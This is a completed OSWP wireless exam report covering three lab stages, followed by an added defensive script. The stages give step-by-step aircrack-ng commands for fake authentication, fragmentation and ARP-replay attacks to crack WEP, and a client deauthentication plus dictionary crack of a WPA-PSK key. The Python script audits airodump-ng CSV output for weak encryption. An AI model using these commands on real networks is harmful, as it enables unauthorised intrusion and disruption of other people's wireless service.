Offensive Security

OSWP Exam Documentation


v.1.0

EMAIL

OSID: OS-XXXXX

©
All rights reserved to Offensive Security, 2020.

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast
for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written
permission from Offensive-Security.

1 | Page
Table of Contents

Table of Contents 1

1.0 Offensive-Security OSWP Exam Documentation 2

2.0 STAGE 1 3

2.1 Wireless Network Key 4

2.2 Screenshots 4

2.3 Steps 5

3.0 STAGE 2 10

3.1 Wireless Network Key 10

3.2 Screenshots 10

3.3 Steps 11

4.0 STAGE 3 15

4.1 Wireless Network Key 15

4.2 Screenshots 15

4.3 Steps 15

5.0 Additional Items Not Mentioned in the Report 19

1.0 Offensive-Security OSWP Exam Documentation

2.0 STAGE 1

2.1 Wireless Network Key

[ DE:AD:CA:FE:BA:BE:99:77:55:33:11:88:66 ]

2.2 Screenshots

2.3 Steps
First we need to know our wireless card's name, so I ran the iwconfig command and found my network card is called wlan0.

Then we need to start monitor mode with this command: airmon-ng start wlan0

Then I started discovering all the networks to get the first stage's channel and BSSID with this command: airodump-ng mon0

Now I have all I need, so let's listen on the target network only with this command:

airodump-ng -c 3 --bssid 1C:7E:E5:41:E5:CB mon0 -w Stage1

Then I tried a fake authentication against the target network with this command:

aireplay-ng -1 0 -e 'STAGE 1' -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e mon0

But this network has no clients, and at the same time I want to collect IVs, so I tried a fragmentation attack with this command:

aireplay-ng -5 -b 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e mon0

Now that I have the keystream file, I can forge a new packet with this command:

packetforge-ng -0 -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e -l 192.168.1.101 -k 192.168.1.255 -y fragment-0209-121548.xor -w Stage1

Then we can use aireplay-ng to inject the forged packet with this command:

aireplay-ng -2 -r Stage1 mon0

Now we are generating traffic to collect the data.

Then let's crack our cap file with this command: aircrack-ng -0 Stage1-01.cap

3.0 STAGE 2

3.1 Wireless Network Key

[ DE:AD:BE:EF:CA:FE:99:77:55:33:11:88:67 ]

3.2 Screenshots

3.3 Steps

First we need to know our wireless card's name, so I ran the iwconfig command and found my network card is called wlan0.

Then we need to start monitor mode with this command: airmon-ng start wlan0

Then I started discovering all the networks to get the second stage's channel and BSSID with this command: airodump-ng mon0

Now I have all I need, so let's listen on the target network only with this command:

airodump-ng -c 11 --bssid 00:14:D1:E1:C7:62 mon0 -w Stage2

Let's try a fake authentication with this command:

aireplay-ng -1 0 -e "STAGE 2" -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0

Then we need to de-authenticate the associated client to obtain the xor file.

aireplay-ng -1 0 -e 'STAGE 2' -y Stage2-01-00-14-D1-E1-C7-62.xor -h 00:c0:ca:36:22:9e mon0

aireplay-ng --arpreplay -b 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0

Let's take a look at the Data count.

aircrack-ng -0 Stage2-01.cap

4.0 STAGE 3

4.1 Wireless Network Key

[ massacre ]

4.2 Screenshots

4.3 Steps

First we need to know our wireless card's name, so I ran the iwconfig command and found my network card is called wlan0.

Then we need to start monitor mode with this command: airmon-ng start wlan0

Then I started discovering all the networks to get the third stage's channel and BSSID with this command: airodump-ng mon0

airodump-ng -c 6 --bssid 00:08:A1:CA:3E:CD mon0 -w stage3

aireplay-ng -0 1 -a 00:08:A1:CA:3E:CD -c 00:c0:ca:30:f1:91 mon0

aircrack-ng -0 -w /root/psk-crack-dictionary stage3-01.cap
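The three stages above succeed because two of the access points still run WEP and the third uses a WPA-PSK passphrase that appears in a dictionary. From the defender's side, the same airodump-ng run that feeds the attack also writes a <prefix>-01.csv next to the .cap file, and that CSV is a convenient inventory of which access points on a site are still configured that way. The following script is an added example, not part of the exam report or of the aircrack-ng suite: it parses the airodump-ng CSV layout (AP table, blank line, station table), flags WEP, open and TKIP networks, and reports how many clients are associated with each, so a network owner can prioritise migration. The sample CSV embedded in it is constructed for this example and uses locally administered (02:) BSSIDs; it is not taken from the exam captures.

```python
"""Audit airodump-ng CSV output for weak wireless security settings (added example)."""
import csv
import re
from dataclasses import dataclass

# Constructed sample in the airodump-ng CSV layout: an AP table, a blank line,
# then a station table. None of these values come from the exam captures.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2020-02-09 12:10:00, 2020-02-09 12:15:48, 3, 54, WEP, WEP, , -40, 1200, 48213, 0.0.0.0, 7, STAGE 1,
02:00:00:00:00:02, 2020-02-09 12:10:00, 2020-02-09 12:15:48, 11, 54, WEP, WEP, SKA, -52, 900, 310, 0.0.0.0, 7, STAGE 2,
02:00:00:00:00:03, 2020-02-09 12:10:00, 2020-02-09 12:15:48, 6, 54, WPA2, CCMP, PSK, -61, 870, 0, 0.0.0.0, 7, STAGE 3,
02:00:00:00:00:04, 2020-02-09 12:10:00, 2020-02-09 12:15:48, 1, 54, WPA, TKIP, PSK, -70, 500, 0, 0.0.0.0, 5, guest,
02:00:00:00:00:05, 2020-02-09 12:10:00, 2020-02-09 12:15:48, 9, 54, OPN, , , -75, 400, 0, 0.0.0.0, 6, lobby,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:11, 2020-02-09 12:11:00, 2020-02-09 12:15:40, -55, 3000, 02:00:00:00:00:02, STAGE 2
02:00:00:00:00:12, 2020-02-09 12:11:00, 2020-02-09 12:15:40, -58, 120, 02:00:00:00:00:03,
"""

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "info": 3}


@dataclass
class Finding:
    bssid: str
    essid: str
    channel: int
    severity: str
    reason: str
    clients: int   # stations airodump-ng saw associated with this BSSID
    ivs: int       # "# IV" column: WEP data frames captured so far


def _read_table(section: str) -> list[dict]:
    """Parse one airodump-ng table (header row + data rows) into dicts with stripped keys and values."""
    reader = csv.DictReader(section.splitlines(), skipinitialspace=True)
    rows = []
    for row in reader:
        cleaned = {}
        for key, value in row.items():
            if key is None:          # surplus trailing fields beyond the header
                continue
            cleaned[key.strip()] = (value or "").strip()
        rows.append(cleaned)
    return rows


def parse_airodump_csv(text: str) -> tuple[list[dict], list[dict]]:
    """Split the CSV into its AP and station tables; airodump-ng separates them with a blank line."""
    sections = [s for s in re.split(r"\n\s*\n", text.replace("\r\n", "\n").strip()) if s.strip()]
    aps = _read_table(sections[0]) if sections else []
    stations = _read_table(sections[1]) if len(sections) > 1 else []
    return aps, stations


def classify(privacy: str, cipher: str, auth: str) -> tuple[str, str]:
    """Map the Privacy/Cipher/Authentication columns to a severity and a one-line reason."""
    if "WEP" in privacy:
        return "critical", "WEP: key recoverable from collected IVs, migrate to WPA2/WPA3"
    if privacy in ("OPN", ""):
        return "high", "open network: traffic is unencrypted"
    if "TKIP" in cipher or privacy == "WPA":
        return "medium", "WPA/TKIP: deprecated cipher, move to WPA2-CCMP or WPA3"
    if auth == "PSK":
        return "info", "WPA2/WPA3 personal: security rests on passphrase strength, avoid dictionary words"
    return "info", "WPA2/WPA3 enterprise (802.1X)"


def audit(text: str) -> list[Finding]:
    """Return one Finding per access point, most severe first."""
    aps, stations = parse_airodump_csv(text)
    clients_per_ap: dict[str, int] = {}
    for st in stations:
        bssid = st.get("BSSID", "")
        if bssid and bssid != "(not associated)":
            clients_per_ap[bssid] = clients_per_ap.get(bssid, 0) + 1
    findings = []
    for ap in aps:
        severity, reason = classify(ap.get("Privacy", ""), ap.get("Cipher", ""),
                                    ap.get("Authentication", ""))
        findings.append(Finding(
            bssid=ap["BSSID"],
            essid=ap.get("ESSID", ""),
            channel=int(ap.get("channel", "0") or 0),
            severity=severity,
            reason=reason,
            clients=clients_per_ap.get(ap["BSSID"], 0),
            ivs=int(ap.get("# IV", "0") or 0),
        ))
    findings.sort(key=lambda f: (SEVERITY_RANK[f.severity], f.bssid))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CSV):
        print(f"[{f.severity:8}] {f.bssid} ch{f.channel:<2} {f.essid!r:12} "
              f"clients={f.clients} ivs={f.ivs}  {f.reason}")
```

Pointing audit() at a real <prefix>-01.csv gives the same report for a live survey. The header row is read from the file rather than hard-coded column positions, so the script tolerates the extra columns newer airodump-ng releases add; the "# IV" count on a WEP network is worth watching, since a count that climbs much faster than the network's own traffic would explain is exactly what the replay steps above produce.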

5.0 Additional Items Not Mentioned in the Report

This section is placed for any additional items that were not mentioned in the overall report.
